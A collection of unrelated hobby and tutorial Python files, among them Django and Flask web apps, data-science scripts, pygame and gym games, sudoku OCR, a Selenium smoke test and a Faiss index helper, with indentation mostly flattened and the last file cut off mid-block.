email = models.EmailField(max_length=100)
date = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.title
class Employee(models.Model):
fullname = models.CharField(null=True, max_length=100)
emp_code = models.CharField(null=True, max_length=3)
mobile = models.CharField(null=True, max_length=15)
|
import pandas as pd
import math
RESULT_CSV_RAW_PATH = "D:/kostya_work/runtime-New_configuration/TestProject/experiments/Bengali_0_01/predictions/validation0.[0]-pr.csv"
DST_PATH = "D:/kostya_work/runtime-New_configuration/TestProject/experiments/Bengali_0_01/predictions/validation0.[0]-pr-submission.csv"
srcDF = pd.read_csv(RESULT_CSV_RAW_PATH)
ids = srcDF['image_id']
l = len(ids)
items = []
rowIDs = set()
for rec in srcDF.items():
cTitle = rec[0]
if cTitle == 'image_id':
continue
series = rec[1]
for i in range(l):
imId = ids[i]
rowId = f"{imId}_{cTitle}"
val = series[i]
if isinstance(val, float):
if math.isnan(val):
val = '0'
else:
val = str(int(val))
elif isinstance(val, int):
val = str(val)
items.append({
'row_id': rowId,
'target': val
})
rowIDs.add(rowId)
prefLen = len("Train_")
def itemKey(x):
s = x['row_id'][prefLen:]
sep = s.index('_')
ind = int(s[:sep])
gr = s[sep + 1:]
res = 0
if gr == 'grapheme_root':
res = 1
elif gr == 'vowel_diacritic':
res = 2
return ind * 3 + res
sortedItems = sorted(items, key=itemKey)
submissionDF = pd.DataFrame(sortedItems, columns=['row_id', 'target'])
submissionDF.to_csv(DST_PATH,index=False)
|
from art import logo
import time
MENU = {
"espresso": {
"ingredients": {
"water": 50,
"milk": 0,
"coffee": 18,
},
"cost": 1.5,
},
"latte": {
"ingredients": {
"water": 200,
"milk": 150,
"coffee": 24,
},
"cost": 2.5,
},
"cappuccino": {
"ingredients": {
"water": 250,
"milk": 100,
"coffee": 24,
},
"cost": 3.0,
}
}
resources = {
"water": 1000,
"milk": 1000,
"coffee": 1000,
"money":0,
}
def print_report():
print(f"Water: {resources['water']}ml\nMilk: {resources['milk']}ml\nCoffee: {resources['coffee']}g\nMoney: ${'{:.2f}'.format(resources['money'])}")
def print_menu():
print("######MENU#######")
print(f"Espresso: ${'{:.2f}'.format(MENU['espresso']['cost'])}\nLatte: ${'{:.2f}'.format(MENU['latte']['cost'])}\nCappuccino: ${'{:.2f}'.format(MENU['cappuccino']['cost'])}")
print("#################\n")
def insert_coins(choice):
print(f"The {choice} is ${'{:.2f}'.format(MENU[choice]['cost'])}. Please insert coins.")
q = input("How many quarters?")
d = input("How many dimes?")
n = input("How many nickles?")
p = input("How many pennies?")
if q == '':
q = 0
if d == '':
d = 0
if n == '':
n = 0
if p == '':
p = 0
total = float((int(q) * .25) + (int(d) * .10) + (int(n) * .05) + (int(p) * .01))
if total >= MENU[choice]['cost']:
change = "{:.2f}".format(total - float(MENU[choice]['cost']))
print(f"Your change is ${change}! Enjoy your {choice}!")
return True
else:
print("You didn't insert enough coins. Refunding money")
return False
def check_resources(choice):
# if resources['milk'] >= MENU[choice]['ingredients']['milk'] \
# and resources['water'] >= MENU[choice]['ingredients']['water'] \
# and resources['coffee'] >= MENU[choice]['ingredients']['coffee']:
if resources['milk'] >= MENU[choice]['ingredients']['milk']:
if resources['water'] >= MENU[choice]['ingredients']['water']:
if resources['coffee'] >= MENU[choice]['ingredients']['coffee']:
return True
else:
print("Sorry, not enough Coffee")
return False
else:
print("Sorry, not enough water")
return False
else:
print("Sorry, not enough milk")
return False
def adjust_resources(choice):
resources['milk'] = resources['milk'] - MENU[choice]['ingredients']['milk']
resources['coffee'] = resources['coffee'] - MENU[choice]['ingredients']['coffee']
resources['water'] = resources['water'] - MENU[choice]['ingredients']['water']
resources['money'] += MENU[choice]['cost']
quit = True
while(quit):
print(logo)
print_menu()
choice = input("What would you like?").lower()
if choice == "report":
print_report()
time.sleep(3)
print('\n' * 40)
elif choice == "off":
print("Shutting Down Coffee Maker!")
quit = False
elif check_resources(choice):
if insert_coins(choice):
adjust_resources(choice)
time.sleep(3)
print('\n' * 40)
quit = True
else:
time.sleep(3)
print('\n' * 40)
quit = True
else:
time.sleep(3)
print('\n' * 40)
        quit = True
|
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as p3
from sklearn.cluster import MeanShift, estimate_bandwidth
from sklearn.datasets.samples_generator import make_blobs
#########################
fig = plt.figure()
ax = p3.Axes3D(fig)
'''
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax.set_xlim3d([-4000,100])
ax.set_ylim3d([-15000,1500])
ax.set_zlim3d([-500,500])
'''
#plt.show()
##############################
#############################################
dataID=0x96
chksum=0;
angle=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
theta=[-15,-13,-11,-9,-7,-5,-4,-3,-2,-1,0,1,3,5,7,9]
theta_degree=np.multiply(theta,np.pi/180)
rangeOne=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
rangeTwo=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
x_all=np.zeros(3600*16)
y_all=np.zeros(3600*16)
z_all=np.zeros(3600*16)
###########################################
f=open('change_axis.pcapng','rb')
data=f.read()
data = bytearray(data)
packetIndex=-1;
count=0;
a=np.arange(-1600,1000)
b=np.zeros(len(a))
b2=np.zeros(len(a))
for l in range(np.size(a)):
b[l]=-(3*a[l])-2350 #lower line
b2[l]=-(3*a[l])+900 #higher
for i in range(np.size(data)):
if i<packetIndex:
continue
if(data[i]==dataID):
chksum=0
for j in range(i+2, i+2+136):
chksum=chksum+data[j]
if ((chksum&0xFF)==data[i+1]):
for k in range(0,16):
angle[k]=((data[i+11+8*k]<<8)+data[i+10+8*k])*0.01
rangeOne[k]=((data[i+13+8*k]<<8)+data[i+12+8*k])
rangeTwo[k]=((data[i+15+8*k]<<8)+data[i+14+8*k])
angle_degree=np.multiply(angle,np.pi/180)
xy=np.multiply(rangeOne,np.cos(theta_degree))
x=np.multiply(xy,np.cos(angle_degree))
y=-np.multiply(xy,np.sin(angle_degree))
z=np.multiply(rangeOne,np.sin(theta_degree))
if(count<3600):
x_all[count*16:(count+1)*16]=x
y_all[count*16:(count+1)*16]=y
z_all[count*16:(count+1)*16]=z
count=count+1
packetIndex=i+138
if(count==3600):
count=0
mask=(3*x_all+ y_all>-2350) & (3*x_all+y_all<800) & (z_all>0)
x_mask=x_all[mask]
y_mask=y_all[mask]
z_mask=z_all[mask]
dstack=[[]]
dstack=np.dstack((x_mask,y_mask,z_mask)).tolist()
dstack=dstack[0]
#print type (dstack)
centers=dstack
#print type (centers)
X, _ = make_blobs(n_samples=10000, centers=centers, cluster_std=0.6)
# #############################################################################
# Compute clustering with MeanShift
                # The following bandwidth can be automatically detected using estimate_bandwidth
bandwidth = estimate_bandwidth(X, quantile=0.5, n_samples=50)
ms = MeanShift(bandwidth=bandwidth, bin_seeding=True)
ms.fit(X)
labels = ms.labels_
cluster_centers = ms.cluster_centers_
#print cluster_centers
#print type(cluster_centers)
labels_unique = np.unique(labels)
n_clusters_ = len(labels_unique)
#print cluster_centers[0]
#print type(cluster_centers[0])
#print cluster_centers[0].size
#print("number of estimated clusters : %d" % n_clusters_)
# #############################################################################
# Plot result
import matplotlib.pyplot as plt
from itertools import cycle
colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')
cluster_members_x=[]
cluster_members_y=[]
cluster_members_z=[]
cluster_center_x=[]
cluster_center_y=[]
cluster_center_z=[]
color_array=[]
color=[]
for k, col in zip(range(n_clusters_), colors):
#cluster_center_x=[]
cluster_center_x.append(0)
cluster_center_y.append(0)
cluster_center_z.append(0)
#print k,(cluster_center_x)
my_members = labels == k
cluster_center = cluster_centers[k]
#ax.clear()
#print x
#ax.scatter(X[my_members, 0], X[my_members, 1],X[my_members, 2],s=0.5,c=col)
for m in range(len(X[my_members,0])):
color.extend(col)
#print len(X[my_members, 0])
#print type(X[my_members, 0])
#ax.scatter(cluster_center[0], cluster_center[1], cluster_center[2],s=10,c='black')
#print cluster_center[0].size
#plt.pause(1e-17)
cluster_members_x.extend(X[my_members, 0])
cluster_members_y.extend(X[my_members, 1])
cluster_members_z.extend(X[my_members, 2])
#print cluster_center_x[k]#,(cluster_center[0])
cluster_center_x[k]=cluster_center[0]
cluster_center_y[k]=cluster_center[1]
cluster_center_z[k]=cluster_center[2]
'''
center_x=cluster_center[0].astype(type('float', (float,), {}))
center_y=cluster_center[1].astype(type('float', (float,), {}))
center_z=cluster_center[2].astype(type('float', (float,), {}))
cluster_center_x.extend(center_x)
cluster_center_y.extend(center_y)
cluster_center_z.extend(center_z)
'''
color_array.extend(color)
#print len(cluster_members_x), len(cluster_center_x)
ax.clear()
ax.set_xlim3d([-1500,1500])
ax.set_ylim3d([-1500,1500])
ax.set_zlim3d([-500,500])
ax.plot(a,b,0,'r')
ax.plot(a,b2,0,'r')
ax.scatter(cluster_members_x, cluster_members_y,cluster_members_z,s=0.5,c=color)
#print cluster_center_x
#print len(cluster_center_x)
#print cluster_centers[:,0]
ax.scatter(cluster_center_x, cluster_center_y, cluster_center_z,s=10,c='black')
plt.pause(1e-17)
'''
ax.clear()
ax.set_xlim3d([-1500,1500])
ax.set_ylim3d([-1500,1500])
ax.set_zlim3d([-500,500])
#ax.scatter(x_all,y_all,z_all,s=2,c='r')
ax.plot(a,b,0,'r')
ax.plot(a,b2,0,'r')
ax.plot(x_mask,y_mask,z_mask,'g.',markersize=0.5)
plt.pause(1e-17)
'''
#break
plt.show()
f.close()
|
print("[*] Position the windows so the text fits niceley inside the window!")
from mss import mss
import cv2
from PIL import Image
import numpy as np
import time
from modules.config import *
x, y = int(screen_resolution.split("x")[0]), int(screen_resolution.split("x")[1])
settings = {"top": int(0.08 * y) + adjust_y, "left":int(x * 0.18) + adjust_x, "width":int(x * 0.7), "height":int(0.25 * y), "mon": monitor_number}
sct = mss()
x_crop = int(x * 0.18)
y_crop = int(y * 0.08)
x_extend_crop = 150#pixels
y_extend_crop = 50#pixels
while True:
sct_img = sct.grab(settings)
img = Image.frombytes('RGB', (sct_img.size.width, sct_img.size.height), sct_img.rgb)
img_bgr = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
try:
crop_img = img_bgr[10:int(0.08 * y) + y_extend_crop, int(x_crop/2 - x_extend_crop + 80):-int(x_crop/2 + x_extend_crop)].copy()
cv2.imshow('"Whos the imposter?" "Voting Ended" [TEST]"', np.array(crop_img))
cv2.imshow('"Imposter" "Crewmate" "Defeat" "Victory" [TEST]"', np.array(img_bgr))
except Exception as e:
print(f"{e}\nLooks like your x_extend_crop or y_extend_crop values are way too high")
exit()
time.sleep(1) #Helps debugging
#cv2.imshow('Among Us Test', np.array(img_bgr))
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
|
# Generated by Django 2.0.3 on 2018-03-13 04:11
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('static_pages', '0002_work'),
]
operations = [
migrations.AlterModelOptions(
name='page',
options={'ordering': ['name'], 'verbose_name': 'Страница', 'verbose_name_plural': 'Страницы'},
),
]
|
from email import message
from flask import Flask, render_template, request, redirect
from cs50 import SQL
# from flask_mail import Mail, Message
SPORTS = [
"MMA",
"Cricket",
"Volleyball",
"Skating",
"Dodgeball",
"Karate Kata",
"Dance",
"Chess"
]
db = SQL("sqlite:///data.db")
app = Flask(__name__)
# app.config["MAIL_DEFAULT_SENDER"] = "provide email via OS "
# app.config["MAIL_PASSWORD"] = "bad practice to provide pass word here"
# app.config["MAIL_PORT"] = 587
# app.config["MAIL_SERVER"] = "smtp.gmail.com"
# app.config["MAIL_USE_TLS"] = True
# app.config["MAIL_USERNAME"] = "provide username via OS"
# mail = Mail(app)
@app.route("/")
def index():
return render_template("index.html", sports=SPORTS)
@app.route("/register", methods=["POST"])
def register():
name = request.form.get("name")
email = request.form.get("email")
sport = request.form.get("sport")
    errors = []
    if not name:
        errors.append("name not provided")
    if not email:
        errors.append("email not provided")
    if not sport:
        errors.append("sport not selected")
    elif sport not in SPORTS:
        errors.append("wrong sport selected")
    if errors:
        return render_template("failure.html", errors=errors)
emails = db.execute("SELECT * FROM registrants")
for mail_id in emails:
if email == mail_id["email"]:
return render_template("failure.html", errors=["Email used already"])
db.execute(
"INSERT INTO registrants(name, email, sport) VALUES(?,?,?)", name, email, sport)
# message = Message("You are registered for sports", recipients=[email])
# mail.send(message)
return render_template("success.html", name=name, sport=sport)
@app.route("/entries")
def entries():
return redirect("/registrants")
@app.route("/registrants")
def registrants():
registrants = db.execute("SELECT * FROM registrants")
return render_template("registrants.html", registrants=registrants)
|
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 9 22:19:14 2018
Multiple Linear Regression
Machine Learning A-Z Python
@author: alyam
"""
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('50_Startups.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, 4].values
#Encode the categorical variable which is "state"
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X = LabelEncoder()
X[:, 3] = labelencoder_X.fit_transform(X[:, 3])
onehotencoder = OneHotEncoder(categorical_features = [3]) #the categorical_features = [3] is the index of the categorical column
X = onehotencoder.fit_transform(X).toarray()
#Avoiding the dummy variable trap
#taking the second column (index 1) to the last column, hence excluding the first column
#We do not have to do this manually since the library already takes care of it.
#This is just for demonstration purposes
X = X[:, 1:]
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature Scaling
"""from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
sc_y = StandardScaler()
y_train = sc_y.fit_transform(y_train)"""
#Fitting Multiple Linear Regression to the training set
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
regressor.fit(X_train, y_train)
#Predicting the Test set results
y_pred = regressor.predict(X_test)
"""Building the optimal model using Backward Elimination"""
#the stats model library does not include having a constant for the equation (y-intercept)
#so need to add a column on ones in front of the dataset
import statsmodels.formula.api as sm
X = np.append(arr = np.ones((50,1)).astype(int), values = X, axis = 1) #axis = 1 means adding a column, axis = 0 means adding a row
#Create a new matrix of features which will be our optimal matrix of features
#Step 2 in the slide: fit the full model with all possible predictors
X_opt = X[:, [0, 1, 2, 3, 4, 5]]
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
#Step 3: Consider the predictor with the highest P-value (which is the P > |t| in the table)
#If P > SL remove the predictor
X_opt = X[:, [0, 1, 3, 4, 5]] #remove x2 that has the highest P-value
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
"""
#repeat
X_opt = X[:, [0, 3, 4, 5]] #remove x2 that has the highest P-value
regressor_ols = sm.OLS(endog = y, exog = X_opt).fit()
regressor_ols.summary()
"""
|
from riordan_utils import *
from sage.rings.integer import Integer
class AbstractPartitioning:
def colours_table(self):
return NumberedColoursTable()
class IsPrimePartitioning(AbstractPartitioning):
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return 1 if element.is_prime() else 0
def dispatched_from_HandleNegativesChoice(self, choice, element):
raise Exception("No prime can be negative")
def str_for(self, filename=False, summary=False):
if filename: template = r"is-prime-partitioning"
elif summary: template = r"is prime partitioning"
else: template = 'partitioning'
return template
class RemainderClassesPartitioning(AbstractPartitioning):
def __init__(self, modulo):
self.modulo = modulo
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return element.mod(self.modulo)
def dispatched_from_HandleNegativesChoice(self, choice, element):
return element.sign(), element.mod(self.modulo)
def str_for(self, filename=False, summary=False):
if filename: template = r"{partitioning}{modulo}-partitioning"
elif summary: template = r"{partitioning}{modulo} partitioning"
else: template = 'partitioning'
return template.format(partitioning="mod", modulo=str(self.modulo))
class MultiplesOfPrimePartitioning(AbstractPartitioning):
def __init__(self, prime):
# if not Integer(prime).is_prime():
# raise ValueError("It is mandatory that the required argument to be a prime.")
self.prime = prime
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return self.prime.divides(element)
def dispatched_from_HandleNegativesChoice(self, choice, element):
return element.sign(), self.prime.divides(element)
def str_for(self, filename=False, summary=False):
if filename: template = r"multiples-of-{modulo}-partitioning"
elif summary: template = r"multiples of {modulo} partitioning"
else: template = 'partitioning'
return template.format(modulo=str(self.prime))
class PowersOfPrimePartitioning(AbstractPartitioning):
def __init__(self, prime):
self.prime = prime
def partition(self, negatives_handling_choice, element):
return negatives_handling_choice.dispatch_on(self, element)
def dispatched_from_IgnoreNegativesChoice(self, choice, element):
return element.is_power_of(self.prime)
def dispatched_from_HandleNegativesChoice(self, choice, element):
        raise Exception("No negative number can be a power of a prime; there's always -1 in its factorization")
|
import gym
from itertools import count
from collections import deque
from utils import SimpleMemory, preprocess, StatRecorder
env = gym.make('Breakout-v0')
obs = env.reset()
total_steps = 1e3
n_frames = 3
memory = SimpleMemory()
stats = StatRecorder()
def get_start_frames(n):
frames = deque(maxlen=n)
for i in range(n):
obs, reward, done, info = env.step(1)
frames.append(preprocess(obs))
return frames
frames = get_start_frames(n_frames)
current_rewards = 0.0
current_timesteps = 0
for step in count(1):
    if step > total_steps:
        break
action = env.action_space.sample()
obs, reward, done, info = env.step(action)
current_state = list(frames)
frames.append(preprocess(obs))
if not done:
next_state = list(frames)
else:
next_state = None
memory.append(current_state, action, next_state, reward)
current_rewards += reward
current_timesteps += 1
if done:
stats.rewards.append(current_rewards)
stats.timesteps.append(current_timesteps)
env.reset()
        frames = get_start_frames(n_frames)
print(step)
print('Done')
|
from django.conf.urls import url,include
from .views import *
from django.views.static import serve
from django.conf import settings
from django.conf.urls.static import static
# 张宸豪
urlpatterns = [
# url(r'^book/$', book_views),
url(r'^book/(\d+)$', book_views),
url(r'findpage/$',findpage_views),
]
#廖万林
urlpatterns += [
url(r'^login/$',login_views),
url(r'^register/$',register_views),
# url(r'^peppa/$',peppa_views),
url(r'^captcha/',include('captcha.urls')),
url(r'^testDecorator/$',testDecorator),
url(r'^loginout/$',loginout_views),
]
urlpatterns +=[
url(r'^refund/(\d+)$',refund_views,name='refund'),
url(r'^listrefund/$',listrefund_views),
url(r'showrefund/(\d+)$',showrefund_views,name='showrefund'),
# url(r'^media/(?P<path>.*)$', serve, {'document_root': settings.MEDIA_ROOT}),
]
# + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns +=[
url(r'^sendemail/$',sendEmail,name='sendemail'),
url(r'^checkcode/$',checkcode_views),
url(r'^resetpwd/$',resetpwd_views),
]
# 孙昊
urlpatterns += [
url(r'^index/$', index_views),
url(r'^find/(?P<title>.+)/$', find_views),
]
|
import pygame
import sys
from random import randrange, choice
def terminate(n=None):
if n is None:
pygame.quit()
sys.exit()
else:
pygame.quit()
sys.exit(n)
class Board(pygame.sprite.Sprite):
    # Sprite class for the logs floating down the river
def __init__(self, y, x=0):
super().__init__(all_sprites)
self.add(boards)
self.length = randrange(40, 70)
self.width = 15
self.y = y
self.added = False
        # Whether the log floats in from the right or from the left
if x != 0:
if x < 0:
self.n = -self.length
else:
self.n = 300
else:
self.n = choice([-self.length, 300])
self.image = pygame.Surface((self.length, self.width),
pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, (73, 19, 13),
(0, 0, self.length, self.width), 0)
self.rect = pygame.Rect((self.n, self.y), (self.length, self.width))
        # Choose the speed at which the sprite 'floats'
if self.n < 0:
self.vx = randrange(2, 5)
else:
self.vx = -1 * randrange(2, 5)
def update(self):
self.rect.x += self.vx
if ((self.n > 0 and self.rect.x < 160) or
(self.n < 0 and self.rect.x > 140)) and (not self.added):
Board(self.y, self.n)
self.added = True
        # Check whether the sprite has floated off the screen
if not self.rect.colliderect(screen_rect):
            # If so, a new sprite floats in from the same direction
if not self.added:
Board(self.y, self.n)
self.kill()
class Land(pygame.sprite.Sprite):
    # Sprite class for the land strips at the top and bottom
def __init__(self, x):
super().__init__(all_sprites)
self.add(land)
self.image = pygame.Surface((300, 35), pygame.SRCALPHA, 32)
pygame.draw.rect(self.image, (43, 110, 58),
(0, 0, 300, 35), 0)
if x == 0:
self.rect = pygame.Rect(0, 0, 300, 35)
else:
self.rect = pygame.Rect(0, 365, 300, 35)
class Gamer(pygame.sprite.Sprite):
    # Sprite class for the player
def __init__(self):
super().__init__(all_sprites)
self.add(gamer)
self.image = pygame.Surface((14, 14), pygame.SRCALPHA, 32)
pygame.draw.circle(self.image, (255, 0, 0),
(7, 7), 7, 0)
self.rect = pygame.Rect((150 - 7, 400 - 29), (14, 14))
def update(self, *kp):
global game_over
if len(kp) > 0:
            # Player movement
if kp[0] == pygame.K_LEFT:
self.rect.x += -20
if kp[0] == pygame.K_UP:
self.rect.y += -30
if kp[0] == pygame.K_RIGHT:
self.rect.x += 20
if kp[0] == pygame.K_DOWN:
self.rect.y += 30
m = pygame.sprite.spritecollideany(self, land)
n = pygame.sprite.spritecollideany(self, boards)
if m is None and n is None:
game_over = True
print('game over')
elif m == land.sprites()[0]:
            # End the game if the player reached the far side
print('win')
end_screen()
terminate(1)
elif n:
            # If the player is standing on a log, move with the log's speed
self.rect.x += n.vx
def start_screen():
    # Draw the start screen
screen.fill((255, 255, 255))
intro_text = ["Cross the river", "",
"Правила миниигры:",
"Тебе необходимо добраться до",
"другой стороны реки по брёвнам,",
"для этого используй стрелки.",
"Нажми на какую-нибудь клавишу",
"или кнопку, чтобы начать игру"]
font = pygame.font.Font(None, 22)
text_coord = 50
for line in intro_text:
string_rendered = font.render(line, True, pygame.Color('black'))
intro_rect = string_rendered.get_rect()
text_coord += 10
intro_rect.top = text_coord
intro_rect.x = 10
text_coord += intro_rect.height
screen.blit(string_rendered, intro_rect)
while True:
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
terminate()
elif ev.type == pygame.KEYDOWN or \
ev.type == pygame.MOUSEBUTTONDOWN:
return
pygame.display.flip()
clock.tick(5)
def end_screen():
    # Draw the end screen
screen.fill((255, 255, 255))
intro_text = ["Ты успешно прошёл миниигру!",
"Нажми на какую-нибудь клавишу",
"или кнопку, чтобы выйти"]
font = pygame.font.Font(None, 22)
text_coord = 50
for line in intro_text:
string_rendered = font.render(line, True, pygame.Color('black'))
intro_rect = string_rendered.get_rect()
text_coord += 10
intro_rect.top = text_coord
intro_rect.x = 10
text_coord += intro_rect.height
screen.blit(string_rendered, intro_rect)
while True:
for ev in pygame.event.get():
if ev.type == pygame.QUIT:
terminate()
elif ev.type == pygame.KEYDOWN or \
ev.type == pygame.MOUSEBUTTONDOWN:
return
pygame.display.flip()
clock.tick(5)
pygame.init()
pygame.display.set_caption('Cross the river')
size = 300, 400
screen = pygame.display.set_mode(size)
screen.fill((255, 255, 255))
clock = pygame.time.Clock()
running = True
game_over = True
screen_rect = (0, 0, 300, 400)
while running:
if game_over:
        # Set up the sprite groups and other state for a new game
start_screen()
all_sprites = pygame.sprite.Group()
land = pygame.sprite.Group()
boards = pygame.sprite.Group()
gamer = pygame.sprite.Group()
Land(0)
Land(1)
for i in range(2, 13):
Board(400 - i * 30)
Gamer()
game_over = False
for event in pygame.event.get():
if event.type == pygame.QUIT:
terminate()
if event.type == pygame.KEYDOWN:
gamer.update(event.key)
screen.fill((40, 35, 245))
boards.update()
gamer.update()
all_sprites.draw(screen)
gamer.draw(screen)
pygame.display.flip()
clock.tick(8)
|
import cv2
import numpy as np
import os
import imutils
import pytesseract
suduku_arr = [[0 for _ in range(9)] for _ in range(9)]
def detect_entire_block(filename):
img=cv2.imread(filename,0)
edges=cv2.Canny(img,100,200)
cnts = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cnts = imutils.grab_contours(cnts)
cnts = sorted(cnts, key = cv2.contourArea, reverse = True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.015 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
x,y,w,h = cv2.boundingRect(screenCnt)
crop_img = img[y:y+h,x:x+w]
get_sep_block(crop_img, True)
def get_sep_block(img, itter, prefix=None):
height, width = img.shape[:2]
x = 0
y = 0
h = height // 3
w = width // 3
for i in range(3):
for j in range(3):
crop_img = img[y:y+h,x:x+w]
offset = 8
height, width = crop_img.shape[:2]
crop_img = crop_img[offset:height-offset, offset:width-offset]
if itter:
new_file = "cv_"+str(prefix)+"_"+str(i)+str(j)+"_1.png"
else:
new_file = "cv_"+str(prefix)+"_"+str(i)+str(j)+"_0.png"
if itter:
get_sep_block(crop_img, False, prefix=str(i)+str(j))
else:
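                # e.g. prefix '12' (outer 3x3 block at row 1, col 2) combined with
                # inner cell (i, j) maps to sudoku cell (1*3 + i, 2*3 + j)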
block_x = int(prefix)//10 * 3 + i
block_y = int(prefix)%10 * 3 + j
get_value_from_img(crop_img, block_x, block_y)
x += w
x = 0
y += h
def get_value_from_img(img, x, y):
text = pytesseract.image_to_string(img, lang='eng',
config='--psm 6 -c tessedit_char_whitelist=0123456789').strip()
if not text:
text = "0"
suduku_arr[x][y] = int(text)
if __name__ == "__main__":
detect_entire_block('images/sudoku_01.jpg')
for i in suduku_arr:
print(i)
|
import unittest
from _feature_objects.feature_screen import DevicesScreen
from _feature_objects.feature_left_menu import *
from _pages.pageLogin import LoginPage
from _pages.pageMain import MainPage
from selenium import webdriver
class SmokeTest(unittest.TestCase):
    driver = None  # shared WebDriver instance, created once in setUpClass
@classmethod
def setUpClass(cls):
print ("\n" + "TEST SUITE: Smoke test (Suite ID: )")
cls.driver = webdriver.Chrome()
login_page = LoginPage(cls.driver)
login_page.open_page()
main_page = login_page.login()
main_page.check_main_page_loaded()
def setUp(self):
main_page = MainPage(self.driver)
main_page._close_popups()
def test_01_delete_devices_from_the_console(self):
devices = Variables.devices_for_smoke_test
left_menu = BaseLeftMenu(self.driver)
left_menu_devices = LeftMenuDevices(self.driver)
devices_page = DevicesScreen(self.driver)
left_menu.open_menu_devices()
left_menu_devices.expand_global_site_view_list()
left_menu_devices.click_global_site_view_label()
# left_menu.click_site_in_global_site_view_list(sitename)
devices_page.delete_devices_in_devices_page_table(devices)
# @unittest.skip
# def test_install_vrep(self):
# pass
#
# @unittest.skip
# def test_apply_vrep(self):
# pass
#
# @unittest.skip
# def test_install_mresponder(self):
# pass
#
# @unittest.skip
# def test_install_forceresident(self):
# pass
def test_02_create_new_site(self):
print ("\n" + "TC#9101. Create new site with acceptable name")
sitename = Variables.site_for_smoke_test
site_name_popup = SiteNamePopup(self.driver)
left_menu_devices = LeftMenuDevices(self.driver)
ribbon_bar = RibbonBar(self.driver)
left_menu_devices.delete_site_if_exists(sitename)
left_menu_devices = LeftMenuDevices(self.driver)
left_menu_devices.click_global_site_view_label()
ribbon_bar.click_button_new_site()
site_name_popup.enter_text_into_name_text_field(sitename)
site_name_popup.click_button_ok()
self.assertTrue(left_menu_devices.check_site_is_in_global_site_view_list(sitename))
print ("TEST PASSED" + "\n")
    '''DO NOT DELETE!!!'''
# def test_add_vrep_to_the_console(self):
# name = "VKYV-DT-IK"
# main_page = MainPage(self.driver)
# devices_page = DevicesScreen(self.driver)
# x = DownloadAndInstall(self.driver)
# main_page.delete_device_from_the_console()
# x.clean_up_device()
# x.download_agent()
# x.install_agent()
# devices_page.click_icon_refresh()
# devices_page.check_device_is_presented(name)
# @unittest.skip
# def test_apply_vrep_to_site(self):
# pass
#
# @unittest.skip
# def test_lock_devices_to_site(self):
# pass
#
# @unittest.skip
# def test_create_discovery_task(self):
# pass
#
# @unittest.skip
# def test_create_devices_groups(self):
# pass
#
# @unittest.skip
# def test_create_patches_group(self):
# pass
# def tearDown(self):
# page = MainPage(self.driver)
# page._close_popups()
@classmethod
def tearDownClass(cls):
cls.driver.quit()
if __name__ == "__main__":
unittest.main(verbosity=2)
|
import os.path as p
import glob
from pathlib import Path
from typing import List, Tuple
import numpy as np
import faiss
from SimSent.indexer.faiss_cache import faiss_cache
__all__ = ['BaseIndexHandler']
class BaseIndexHandler(object):
DiffScores = List[np.float32]
VectorIDs = List[np.int64]
FaissSearch = Tuple[DiffScores, VectorIDs]
def __init__(self):
self.index = None
self.dynamic = False
self.io_flag = faiss.IO_FLAG_ONDISK_SAME_DIR
@faiss_cache(128)
    def search(self, query_vector: np.ndarray, k: int) -> FaissSearch:
return self.index.search(query_vector, k)
def get_index_paths(self, idx_dir_pth: Path,
nested: bool = False) -> List[Path]:
get = '*/*.index' if nested else '*.index'
index_paths = glob.glob(p.abspath(idx_dir_pth/get))
index_paths = [Path(pth) for pth in index_paths if # Skip empty indexes
faiss.read_index(pth, self.io_flag).ntotal > 0]
return sorted(index_paths)
@staticmethod
def joint_sort(scores: DiffScores, ids: VectorIDs) -> FaissSearch:
"""
Sorts scores in ascending order while maintaining score::id mapping.
Checks if input is already sorted.
:param scores: Faiss query/hit vector L2 distances
:param ids: Corresponding faiss vector ids
:return: Scores sorted in ascending order with corresponding ids
"""
# Check if sorted
if all(scores[i] <= scores[i + 1] for i in range(len(scores) - 1)):
return scores, ids
# Joint sort
sorted_difs, sorted_ids = (list(sorted_dif_ids) for sorted_dif_ids
in zip(*sorted(zip(scores, ids))))
return sorted_difs, sorted_ids
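# Illustrative usage of joint_sort (an added sketch, not part of the original
# module): the distances and ids below are hypothetical, not real Faiss output.
if __name__ == '__main__':
    example_scores, example_ids = [0.8, 0.2, 0.5], [11, 42, 7]
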